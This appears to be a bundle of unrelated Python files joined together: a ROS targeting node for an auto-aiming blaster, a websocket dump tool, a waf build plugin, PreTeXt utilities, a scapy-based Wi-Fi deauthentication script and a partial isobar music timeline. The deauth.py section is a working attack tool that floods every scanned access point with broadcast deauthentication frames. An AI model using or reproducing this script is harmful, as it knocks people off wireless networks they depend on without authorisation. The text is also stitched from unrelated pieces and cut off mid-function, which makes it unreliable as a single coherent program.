msg = BlasterCtrlMsg()
msg.x_angle = constants.ActionValues.XDEFAULT
msg.y_angle = constants.ActionValues.YDEFAULT
msg.flywheel = constants.ActionValues.SAFE
msg.trigger = constants.ActionValues.SAFE
self.lock = threading.Lock()
# Create a background servo publish thread.
self.stop_thread = False
self.thread_initialized = False
self.thread = threading.Thread(target=self.action_publish, args=(msg,))
self.thread.start()
self.thread_initialized = True
self.get_logger().info(f"Waiting for input delta: {constants.OBJECT_DETECTION_DELTA_TOPIC}")
def wait_for_thread(self):
"""Function which joins the created background thread.
"""
if self.thread_initialized:
self.thread.join()
self.get_logger().info("Thread joined")
def thread_shutdown(self):
"""Function which sets the flag to shutdown background thread.
"""
self.stop_thread = True
def detection_delta_cb(self, detection_delta):
"""Call back for whenever detection delta for a perception
is received from object_detection_node.
Args:
detection_delta (DetectionDeltaMsg): Message containing the normalized detection
delta in x and y axes respectively passed as
a list.
"""
self.delta_buffer.put(detection_delta)
def plan_action(self, delta):
"""Helper method to calculate action to be undertaken from the detection delta
received from object_detection_node.
Args:
delta (list of floats): detection deltas in x and y axes respectively.
Returns:
(int): Action Space Category defined in constants.py
"""
delta_x = delta[0]
delta_y = delta[1]
# Delta_Y could be used to determine when we are close enough to fire blaster
# if delta_y < constants.DeltaValueMap.FIRE_DELTA_Y:
# # Fire!
# return constants.ACTION_SPACE[7][constants.ActionSpaceKeys.CATEGORY]
# elif delta_y >= constants.DeltaValueMap.FIRE_DELTA_Y:
# Forward Bracket
if delta_x < constants.DeltaValueMap.SHORT_LEFT_DELTA_X \
and delta_x > constants.DeltaValueMap.MID_LEFT_DELTA_X:
# Short Left
return constants.ACTION_SPACE[2][constants.ActionSpaceKeys.CATEGORY]
elif delta_x < constants.DeltaValueMap.MID_LEFT_DELTA_X \
and delta_x > constants.DeltaValueMap.FAR_LEFT_DELTA_X:
# Mid Left
return constants.ACTION_SPACE[3][constants.ActionSpaceKeys.CATEGORY]
elif delta_x <= constants.DeltaValueMap.FAR_LEFT_DELTA_X:
# Far Left
return constants.ACTION_SPACE[4][constants.ActionSpaceKeys.CATEGORY]
elif delta_x > constants.DeltaValueMap.SHORT_RIGHT_DELTA_X \
and delta_x < constants.DeltaValueMap.MID_RIGHT_DELTA_X:
# Short Right
return constants.ACTION_SPACE[5][constants.ActionSpaceKeys.CATEGORY]
elif delta_x > constants.DeltaValueMap.MID_RIGHT_DELTA_X \
and delta_x < constants.DeltaValueMap.FAR_RIGHT_DELTA_X:
# Mid Right
return constants.ACTION_SPACE[6][constants.ActionSpaceKeys.CATEGORY]
elif delta_x >= constants.DeltaValueMap.FAR_RIGHT_DELTA_X:
# Far Right
return constants.ACTION_SPACE[7][constants.ActionSpaceKeys.CATEGORY]
else:
# No Action
return constants.ACTION_SPACE[1][constants.ActionSpaceKeys.CATEGORY]
def get_mapped_action(self, action_category):
"""Return the angle and trigger values to be published for servo.
Args:
action_category (int): Integer value corresponding to the action space category.
Returns:
x_angle (float): Angle value to be published to servo.
y_angle (float): Angle value to be published to servo.
flywheel (int): Trigger value to be published to relay.
trigger (int): Trigger value to be published to relay.
"""
action = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.ACTION]
self.get_logger().info(action)
x_angle = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.XANGLE]
y_angle = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.YANGLE]
#if object is detected, we should spinup flywheels in preparation for firing
flywheel = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.FLYWHEEL]
#else
flywheel = constants.ActionValues.SAFE
# if object detection x_delta is near zero, and flywheels are spinning, fire!
trigger = constants.ACTION_SPACE[action_category][constants.ActionSpaceKeys.FLYWHEEL]
# else
# trigger = constants.ActionValues.SAFE
return x_angle, y_angle, flywheel, trigger
def action_publish(self, msg):
"""Function which runs in a separate thread to read object detection delta
from double buffer, decides the action and sends it to Blaster Control node.
Args:
msg: detection_delta (DetectionDeltaMsg): Message containing the normalized
detection delta in x and y axes respectively passed as a list.
"""
try:
while not self.stop_thread:
# Get a new message to plan action on
detection_delta = self.delta_buffer.get()
action_category = self.plan_action(detection_delta.delta)
msg.x_angle, msg.y_angle, msg.flywheel, msg.trigger = self.get_mapped_action(action_category)
# Publish msg based on action planned and mapped from a new object detection.
self.action_publisher.publish(msg)
# Sleep for a default amount of time before checking if new data is available.
time.sleep(constants.DEFAULT_SLEEP)
# If new data is not available within default time, gracefully run blind.
while self.delta_buffer.is_empty() and not self.stop_thread:
msg.x_angle, msg.y_angle, msg.flywheel, msg.trigger = self.get_mapped_action(action_category)
# @TODO Return x_angle value to 90 degrees
# msg.x_angle = msg.x_angle / 2
# Publish blind action
self.action_publisher.publish(msg)
# Sleep before checking if new data is available.
time.sleep(0.1)
except Exception as ex:
self.get_logger().error(f"Failed to publish action to blaster control topic: {ex}")
# Stop the car
msg.x_angle, msg.y_angle, msg.flywheel, msg.trigger = constants.ActionValues.XDEFAULT, constants.ActionValues.YDEFAULT, constants.ActionValues.SAFE, constants.ActionValues.SAFE
self.action_publisher.publish(msg)
# Destroy the ROS Node running in another thread as well.
self.destroy_node()
rclpy.shutdown()
def main(args=None):
rclpy.init(args=args)
qos = QoSProfile(reliability=QoSReliabilityPolicy.RMW_QOS_POLICY_RELIABILITY_BEST_EFFORT,
depth=1,
history=QoSHistoryPolicy.RMW_QOS_POLICY_HISTORY_KEEP_LAST)
try:
deepblaster_targeting_node = DBTargetingNode(qos)
executor = MultiThreadedExecutor()
def signal_handler(signum, frame):
"""Callback function to handle registered signal handler
to join and stop executing running thread created.
Args:
signum: The signal number.
frame: the current stack frame (None or a frame object).
"""
deepblaster_targeting_node.get_logger().info("Signal Handler initiated")
deepblaster_targeting_node.thread_shutdown()
deepblaster_targeting_node.wait_for_thread()
# Register SIGINT handler
signal.signal(signal.SIGINT, signal_handler)
rclpy.spin(deepblaster_targeting_node, executor)
except Exception as ex:
deepblaster_targeting_node.get_logger().error(f"Exception in DBTargetingNode: {ex}")
deepblaster_targeting_node.destroy_node()
rclpy.shutdown()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
deepblaster_targeting_node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
wsdump.py
|
#!C:\Users\rexli\Desktop\Commonly Used\StockTradingBot\venv\Scripts\python.exe
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
preforkunix.py
|
#! /usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2015 (ita)
"""
A version of prefork.py that uses unix sockets. The advantage is that it does not expose
connections to the outside. Yet performance it only works on unix-like systems
and performance can be slightly worse.
To use::
def options(opt):
# recommended, fork new processes before using more memory
opt.load('preforkunix')
def build(bld):
bld.load('preforkunix')
...
more code
"""
import os, re, socket, threading, sys, subprocess, atexit, traceback, signal, time
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
import cPickle
except ImportError:
import pickle as cPickle
HEADER_SIZE = 20
REQ = 'REQ'
RES = 'RES'
BYE = 'BYE'
def make_header(params, cookie=''):
header = ','.join(params)
header = header.ljust(HEADER_SIZE - len(cookie))
assert(len(header) == HEADER_SIZE - len(cookie))
header = header + cookie
if sys.hexversion > 0x3000000:
header = header.encode('iso8859-1')
return header
re_valid_query = re.compile('^[a-zA-Z0-9_, ]+$')
if 1:
def send_response(conn, ret, out, err, exc):
if out or err or exc:
data = (out, err, exc)
data = cPickle.dumps(data, -1)
else:
data = ''
params = [RES, str(ret), str(len(data))]
# no need for the cookie in the response
conn.send(make_header(params))
if data:
conn.send(data)
def process_command(conn):
query = conn.recv(HEADER_SIZE)
if not query:
return None
#print(len(query))
assert(len(query) == HEADER_SIZE)
if sys.hexversion > 0x3000000:
query = query.decode('iso8859-1')
#print "%r" % query
if not re_valid_query.match(query):
send_response(conn, -1, '', '', 'Invalid query %r' % query)
raise ValueError('Invalid query %r' % query)
query = query.strip().split(',')
if query[0] == REQ:
run_command(conn, query[1:])
elif query[0] == BYE:
raise ValueError('Exit')
else:
raise ValueError('Invalid query %r' % query)
return 'ok'
def run_command(conn, query):
size = int(query[0])
data = conn.recv(size)
assert(len(data) == size)
kw = cPickle.loads(data)
# run command
ret = out = err = exc = None
cmd = kw['cmd']
del kw['cmd']
#print(cmd)
try:
if kw['stdout'] or kw['stderr']:
p = subprocess.Popen(cmd, **kw)
(out, err) = p.communicate()
ret = p.returncode
else:
ret = subprocess.Popen(cmd, **kw).wait()
except KeyboardInterrupt:
raise
except Exception as e:
ret = -1
exc = str(e) + traceback.format_exc()
send_response(conn, ret, out, err, exc)
if 1:
from waflib import Logs, Utils, Runner, Errors, Options
def init_task_pool(self):
# lazy creation, and set a common pool for all task consumers
pool = self.pool = []
for i in range(self.numjobs):
consumer = Runner.get_pool()
pool.append(consumer)
consumer.idx = i
self.ready = Queue(0)
def setq(consumer):
consumer.ready = self.ready
try:
threading.current_thread().idx = consumer.idx
except Exception as e:
print(e)
for x in pool:
x.ready.put(setq)
return pool
Runner.Parallel.init_task_pool = init_task_pool
def make_conn(bld):
child_socket, parent_socket = socket.socketpair(socket.AF_UNIX)
ppid = os.getpid()
pid = os.fork()
if pid == 0:
parent_socket.close()
# if the parent crashes, try to exit cleanly
def reap():
while 1:
try:
os.kill(ppid, 0)
except OSError:
break
else:
time.sleep(1)
os.kill(os.getpid(), signal.SIGKILL)
t = threading.Thread(target=reap)
t.setDaemon(True)
t.start()
# write to child_socket only
try:
while process_command(child_socket):
pass
except KeyboardInterrupt:
sys.exit(2)
else:
child_socket.close()
return (pid, parent_socket)
SERVERS = []
CONNS = []
def close_all():
global SERVERS, CONS
while CONNS:
conn = CONNS.pop()
try:
conn.close()
except:
pass
while SERVERS:
pid = SERVERS.pop()
try:
os.kill(pid, 9)
except:
pass
atexit.register(close_all)
def put_data(conn, data):
cnt = 0
while cnt < len(data):
sent = conn.send(data[cnt:])
if sent == 0:
raise RuntimeError('connection ended')
cnt += sent
def read_data(conn, siz):
cnt = 0
buf = []
while cnt < siz:
data = conn.recv(min(siz - cnt, 1024))
if not data:
raise RuntimeError('connection ended %r %r' % (cnt, siz))
buf.append(data)
cnt += len(data)
if sys.hexversion > 0x3000000:
ret = ''.encode('iso8859-1').join(buf)
else:
ret = ''.join(buf)
return ret
def exec_command(self, cmd, **kw):
if 'stdout' in kw:
if kw['stdout'] not in (None, subprocess.PIPE):
return self.exec_command_old(cmd, **kw)
elif 'stderr' in kw:
if kw['stderr'] not in (None, subprocess.PIPE):
return self.exec_command_old(cmd, **kw)
kw['shell'] = isinstance(cmd, str)
Logs.debug('runner: %r' % cmd)
Logs.debug('runner_env: kw=%s' % kw)
if self.logger:
self.logger.info(cmd)
if 'stdout' not in kw:
kw['stdout'] = subprocess.PIPE
if 'stderr' not in kw:
kw['stderr'] = subprocess.PIPE
if Logs.verbose and not kw['shell'] and not Utils.check_exe(cmd[0]):
raise Errors.WafError("Program %s not found!" % cmd[0])
idx = threading.current_thread().idx
kw['cmd'] = cmd
# serialization..
#print("sub %r %r" % (idx, cmd))
#print("write to %r %r" % (idx, cmd))
data = cPickle.dumps(kw, -1)
params = [REQ, str(len(data))]
header = make_header(params)
conn = CONNS[idx]
put_data(conn, header + data)
#print("running %r %r" % (idx, cmd))
#print("read from %r %r" % (idx, cmd))
data = read_data(conn, HEADER_SIZE)
if sys.hexversion > 0x3000000:
data = data.decode('iso8859-1')
#print("received %r" % data)
lst = data.split(',')
ret = int(lst[1])
dlen = int(lst[2])
out = err = None
if dlen:
data = read_data(conn, dlen)
(out, err, exc) = cPickle.loads(data)
if exc:
raise Errors.WafError('Execution failure: %s' % exc)
if out:
if not isinstance(out, str):
out = out.decode(sys.stdout.encoding or 'iso8859-1')
if self.logger:
self.logger.debug('out: %s' % out)
else:
Logs.info(out, extra={'stream':sys.stdout, 'c1': ''})
if err:
if not isinstance(err, str):
err = err.decode(sys.stdout.encoding or 'iso8859-1')
if self.logger:
self.logger.error('err: %s' % err)
else:
Logs.info(err, extra={'stream':sys.stderr, 'c1': ''})
return ret
def init_smp(self):
if not getattr(Options.options, 'smp', getattr(self, 'smp', None)):
return
if Utils.unversioned_sys_platform() in ('freebsd',):
pid = os.getpid()
cmd = ['cpuset', '-l', '0', '-p', str(pid)]
elif Utils.unversioned_sys_platform() in ('linux',):
pid = os.getpid()
cmd = ['taskset', '-pc', '0', str(pid)]
if cmd:
self.cmd_and_log(cmd, quiet=0)
def options(opt):
# memory consumption might be at the lowest point while processing options
opt.add_option('--pin-process', action='store_true', dest='smp', default=False)
if Utils.is_win32 or os.sep != '/':
return
while len(CONNS) < 30:
(pid, conn) = make_conn(opt)
SERVERS.append(pid)
CONNS.append(conn)
def build(bld):
if Utils.is_win32 or os.sep != '/':
return
if bld.cmd == 'clean':
return
while len(CONNS) < bld.jobs:
(pid, conn) = make_conn(bld)
SERVERS.append(pid)
CONNS.append(conn)
init_smp(bld)
bld.__class__.exec_command_old = bld.__class__.exec_command
bld.__class__.exec_command = exec_command
|
utils.py
|
import os
import glob
import random
import json
from contextlib import contextmanager
from http.server import SimpleHTTPRequestHandler
import shutil
import pathlib
import socketserver
import socket
import logging
import threading
import watchdog.events, watchdog.observers, time
from lxml import etree as ET
from . import static
# Get access to logger
log = logging.getLogger('ptxlogger')
@contextmanager
def working_directory(path):
"""
Temporarily change the current working directory.
Usage:
with working_directory(path):
do_things() # working in the given path
do_other_things() # back to original path
"""
current_directory=os.getcwd()
os.chdir(path)
log.debug(f"Now working in directory {path}")
try:
yield
finally:
os.chdir(current_directory)
log.debug(f"Successfully changed directory back to {current_directory}")
def linux_path(path):
# hack to make core ptx and xsl:import happy
p = pathlib.Path(path)
return p.as_posix()
def directory_exists(path):
"""
Checks if the directory exists.
"""
return os.path.exists(path)
# Grabs project directory based on presence of `project.ptx`
def project_path(dirpath=os.getcwd()):
if os.path.isfile(os.path.join(dirpath,'project.ptx')):
# we're at the project root
return dirpath
parentpath = os.path.dirname(dirpath)
if parentpath == dirpath:
# cannot ascend higher, no project found
return None
else:
# check parent instead
return project_path(dirpath=parentpath)
def project_xml(dirpath=os.getcwd()):
if project_path(dirpath) is None:
project_manifest = static.path('templates','project.ptx')
else:
project_manifest = os.path.join(project_path(dirpath), 'project.ptx')
return ET.parse(project_manifest)
def project_xml_string(dirpath=os.getcwd()):
return ET.tostring(project_xml(dirpath), encoding='unicode')
def target_xml(alias=None,dirpath=os.getcwd()):
if alias is None:
return project_xml().find("targets/target")
xpath = f'targets/target[@name="{alias}"]'
matches = project_xml().xpath(xpath)
if len(matches) == 0:
log.info(f"No targets with alias {alias} found in project manifest file project.ptx.")
return None
return project_xml().xpath(xpath)[0]
def text_from_project_xml(xpath,default=None):
matches = project_xml().xpath(xpath)
if len(matches) > 0:
return matches[0].text.strip()
else:
return default
#check xml syntax
def xml_syntax_is_valid(xmlfile):
# parse xml
try:
source_xml = ET.parse(xmlfile)
# we need to call xinclude once for each level of nesting (just to check for errors). 25 levels should be more than sufficient
for i in range(25):
source_xml.xinclude()
log.debug('XML syntax appears well formed.')
if (source_xml.getroot().tag != 'pretext'):
log.error(f'The file {xmlfile} does not have "<pretext>" as its root element. Did you use a subfile as your source? Check the project manifest (project.ptx).')
return False
# check for file IO error
except IOError:
log.error(f'The file {xmlfile} does not exist')
return False
# check for XML syntax errors
except ET.XMLSyntaxError as err:
log.error('XML Syntax Error caused build to fail:')
log.error(str(err.error_log))
return False
except ET.XIncludeError as err:
log.error('XInclude Error caused build to fail:')
log.error(str(err.error_log))
return False
return True
def xml_source_validates_against_schema(xmlfile):
#get path to RelaxNG schema file:
schemarngfile = static.path('schema','pretext.rng')
# Open schemafile for validation:
relaxng = ET.RelaxNG(file=schemarngfile)
# Parse xml file:
source_xml = ET.parse(xmlfile)
## just for testing:
# relaxng.validate(source_xml)
# log = relaxng.error_log
# print(log)
# validate against schema
try:
relaxng.assertValid(source_xml)
log.info('PreTeXt source passed schema validation.')
except ET.DocumentInvalid as err:
log.debug('PreTeXt document did not pass schema validation; unexpected output may result. See .error_schema.log for hints. Continuing with build.')
with open('.error_schema.log', 'w') as error_log_file:
error_log_file.write(str(err.error_log))
return False
return True
# watchdog handler for watching changes to source
class HTMLRebuildHandler(watchdog.events.FileSystemEventHandler):
def __init__(self,callback):
self.last_trigger_at = time.time()-5
self.callback = callback
def on_any_event(self,event):
self.last_trigger_at = time.time()
# only run callback once triggers halt for a second
def timeout_callback(handler):
time.sleep(1.5)
if time.time() > handler.last_trigger_at + 1:
handler.last_trigger_at = time.time()
log.info("\nChanges to source detected.\n")
handler.callback()
threading.Thread(target=timeout_callback,args=(self,)).start()
# boilerplate to prevent overzealous caching by preview server, and
# avoid port issues
def binding_for_access(access="private"):
if os.path.isfile("/home/user/.smc/info.json") or access=="public":
return "0.0.0.0"
else:
return "localhost"
def url_for_access(access="private",port=8000):
if os.path.isfile("/home/user/.smc/info.json"):
project_id = json.loads(open('/home/user/.smc/info.json').read())['project_id']
return f"https://cocalc.com/{project_id}/server/{port}/"
elif access=='public':
return f"http://{socket.gethostbyname(socket.gethostname())}:{port}"
else:
return f"http://localhost:{port}"
def serve_forever(directory,access="private",port=8000):
log.info(f"Now starting a server to preview directory `{directory}`.\n")
binding = binding_for_access(access)
class RequestHandler(SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory=directory, **kwargs)
"""HTTP request handler with no caching"""
def end_headers(self):
self.send_my_headers()
SimpleHTTPRequestHandler.end_headers(self)
def send_my_headers(self):
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
class TCPServer(socketserver.TCPServer):
allow_reuse_address = True
looking_for_port = True
while looking_for_port:
try:
with TCPServer((binding, port), RequestHandler) as httpd:
looking_for_port = False
url = url_for_access(access,port)
log.info(f"Success! Open the below url in a web browser to preview the most recent build of your project.")
log.info(" "+url)
log.info("Use [Ctrl]+[C] to halt the server.\n")
httpd.serve_forever()
except OSError:
log.warning(f"Port {port} could not be used.")
port = random.randint(49152,65535)
log.warning(f"Trying port {port} instead.\n")
def run_server(directory,access,port,watch_directory=None,watch_callback=lambda:None):
binding = binding_for_access(access)
threading.Thread(target=lambda: serve_forever(directory,access,port),daemon=True).start()
if watch_directory is not None:
log.info(f"\nWatching for changes in `{watch_directory}` ...\n")
event_handler = HTMLRebuildHandler(watch_callback)
observer = watchdog.observers.Observer()
observer.schedule(event_handler, watch_directory, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
log.info("\nClosing server...")
if watch_directory is not None: observer.stop()
if watch_directory is not None: observer.join()
# Info on namespaces: http://lxml.de/tutorial.html#namespaces
NSMAP = {
"xi": "http://www.w3.org/2001/XInclude",
"xml": "http://www.w3.org/XML/1998/namespace",
}
def nstag(prefix,suffix):
return "{" + NSMAP[prefix] + "}" + suffix
def expand_pretext_href(lxml_element):
'''
Expands @pretext-href attributes to point to the distributed xsl directory.
'''
for ele in lxml_element.xpath('//*[@pretext-href]'):
ele.set('href',str(linux_path(static.core_xsl(ele.get('pretext-href'),as_path=True))))
def copy_expanded_xsl(xsl_path: str, output_dir: str):
"""
Copy relevant files that share a directory with `xsl_path`
while pre-processing the `.xsl` files.
"""
xsl_dir = os.path.abspath(os.path.dirname(xsl_path))
output_dir = os.path.abspath(output_dir)
log.debug(f"Copying all files in {xsl_dir} to {output_dir}")
shutil.copytree(xsl_dir, output_dir, dirs_exist_ok=True)
# expand each xsl file
with working_directory(output_dir):
for filename in glob.iglob('**',recursive=True):
# glob lists both files and directories, but we only want to copy files.
if os.path.isfile(filename) and filename.endswith('.xsl'):
log.debug(f"Expanding and copying {filename}")
try:
lxml_element = ET.parse(filename)
expand_pretext_href(lxml_element)
lxml_element.write(filename)
# maybe an xsl file is malformed, but let's continue in case it's unused
except Exception as e:
log.warning(f"Hit error `{e}` when expanding {filename}, continuing anyway...")
|
deauth.py
|
import logging
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import socket
from subprocess import call
from threading import Thread
from time import sleep
import printings
# local imports
from scan import WifiScan
conf.verb = 0
RED = "\033[1;31m"
GREEN = "\033[1;32m"
YELLOW = "\033[1;93m"
T_YELLOW = "\033[0;93m"
NORMAL = "\033[0;0m"
class Deauth(object):
def __init__(self, APs, interface):
self.APs = APs
self.interface = interface
self.BROADCAST = "FF:FF:FF:FF:FF:FF"
self.burst = 32
def start_deauth(self):
conf.iface = self.interface
if 3 <= len(self.APs) < 5:
self.burst = 10
if len(self.APs) >= 7:
self.burst = 3
i=0
while i<10:
for bssid in self.APs:
packet = Dot11(addr1=self.BROADCAST, addr2=bssid, addr3=bssid) / Dot11Deauth()
channel = self.APs[bssid]
call("sudo iwconfig {iface} channel {ch}".format(iface=self.interface, ch=channel), shell=True)
try:
send(packet, count=self.burst)
except socket.error:
print("{R}ERROR: Network-Interface is down.{N}".format(R=RED, N=NORMAL))
sys.exit(0)
print("[{G}+{N}] {pkt} frames sent to {Y}{bssid}{N}".format(pkt=self.burst, G=GREEN, N=NORMAL, Y=YELLOW, bssid=bssid.upper()))
sleep(1)
i = i+1
class DeauthAll(object):
def __init__(self, interface):
self.interface = interface
self.burst = 32
self.BROADCAST = "FF:FF:FF:FF:FF:FF"
self.deauth_active = False
def start_deauth_all(self):
def scan():
call("sudo clear", shell=True)
print("[{Y}*{N}] Scanning for new Access-Points... (8 sec.)".format(Y=YELLOW, N=NORMAL))
self.deauth_active = False
wifiscan.channelhop_active = True
wifiscan.do_scan()
wifiscan.channelhop_active = False
self.APs = wifiscan.get_access_points()
if len(self.APs) < 1:
print("\n{R}No Access-Points found. :({N}\n".format(R=RED, N=NORMAL))
thread.interrupt_main()
printings.deauth_all()
for bssid in self.APs:
print(" {G}->{N} {bssid} | {Y}{essid}{N}".format(G=GREEN, Y=T_YELLOW, N=NORMAL, bssid=bssid, essid=self.APs[bssid]["essid"]))
self.deauth_active = True
sleep(120)
scan()
conf.iface = self.interface
wifiscan = WifiScan(self.interface)
wifiscan.do_output = False
wifiscan.timeout = 8
hopT = Thread(target=wifiscan.channelhop, args=[])
hopT.daemon = True
hopT.start()
scanT = Thread(target=scan, args=[])
scanT.daemon = True
scanT.start()
while True:
if self.deauth_active:
if 1 < len(self.APs) < 5:
self.burst = 10
elif 5 < len(self.APs):
self.burst = 3
for bssid in self.APs:
packet = Dot11(addr1=self.BROADCAST, addr2=bssid, addr3=bssid) / Dot11Deauth()
send(packet, count=self.burst)
sleep(1)
|
timeline.py
|
import math
import copy
import threading
from .track import Track
from .clock import Clock
from .event import EventDefaults
from ..key import Key
from ..io import MidiOutputDevice
from ..constants import DEFAULT_TICKS_PER_BEAT, DEFAULT_TEMPO
from ..constants import EVENT_TIME, EVENT_ACTION, INTERPOLATION_NONE
from ..exceptions import TrackLimitReachedException, TrackNotFoundException
from ..util import make_clock_multiplier
import logging
log = logging.getLogger(__name__)
class Timeline(object):
"""
A Timeline object encapsulates a number of Tracks, each of which
represents a sequence of note or control events.
It has a `clock_source`, which can be a real-time Clock object, or an
external source such as a MIDI clock (via `isobar.io.MidiInputDevice`).
A Timeline typically runs until it is terminated by calling `stop()`.
If you want the Timeline to terminate as soon as no more events are available,
set `stop_when_done = True`.
"""
def __init__(self,
tempo=DEFAULT_TEMPO,
output_device=None,
clock_source=None,
ticks_per_beat=DEFAULT_TICKS_PER_BEAT):
""" Expect to receive one tick per beat, generate events at 120bpm """
self._clock_source = None
if clock_source is None:
clock_source = Clock(self, tempo, ticks_per_beat)
self.set_clock_source(clock_source)
self.output_devices = []
self.clock_multipliers = {}
if output_device:
self.add_output_device(output_device)
self.current_time = 0
self.max_tracks = 0
self.tracks = []
self.thread = None
self.stop_when_done = False
self.events = []
self.running = False
self.ignore_exceptions = False
self.defaults = EventDefaults()
def get_clock_source(self):
return self._clock_source
def set_clock_source(self, clock_source):
clock_source.clock_target = self
self._clock_source = clock_source
clock_source = property(get_clock_source, set_clock_source)
def get_ticks_per_beat(self):
if self.clock_source:
return self.clock_source.ticks_per_beat
else:
return None
def set_ticks_per_beat(self, ticks_per_beat):
self.clock_source.ticks_per_beat = ticks_per_beat
ticks_per_beat = property(get_ticks_per_beat, set_ticks_per_beat)
@property
def tick_duration(self):
"""
Tick duration, in beats.
"""
return 1.0 / self.ticks_per_beat
def get_tempo(self):
""" Returns the tempo of this timeline's clock, or None if an external
clock source is used (in which case the tempo is unknown).
"""
return self.clock_source.tempo
def set_tempo(self, tempo):
"""
Set the tempo of this timeline's clock.
If the timeline uses an external clock, this operation is invalid, and a
RuntimeError is raised.
Args:
tempo (float): Tempo, in bpm
"""
self.clock_source.tempo = tempo
tempo = property(get_tempo, set_tempo)
def seconds_to_beats(self, seconds):
return seconds * self.tempo / 60.0
def beats_to_seconds(self, beats):
return beats * 60.0 / self.tempo
def tick(self):
"""
Called once every tick to trigger new events.
Raises:
StopIteration: If `stop_when_done` is true and no more events are scheduled.
"""
#--------------------------------------------------------------------------------
# Each time we arrive at precisely a new beat, generate a debug msg.
# Round to several decimal places to avoid 7.999999999 syndrome.
# http://docs.python.org/tutorial/floatingpoint.html
#--------------------------------------------------------------------------------
if round(self.current_time, 8) % 1 == 0:
log.debug("--------------------------------------------------------------------------------")
log.debug("Tick (%d active tracks, %d pending events)" % (len(self.tracks), len(self.events)))
#--------------------------------------------------------------------------------
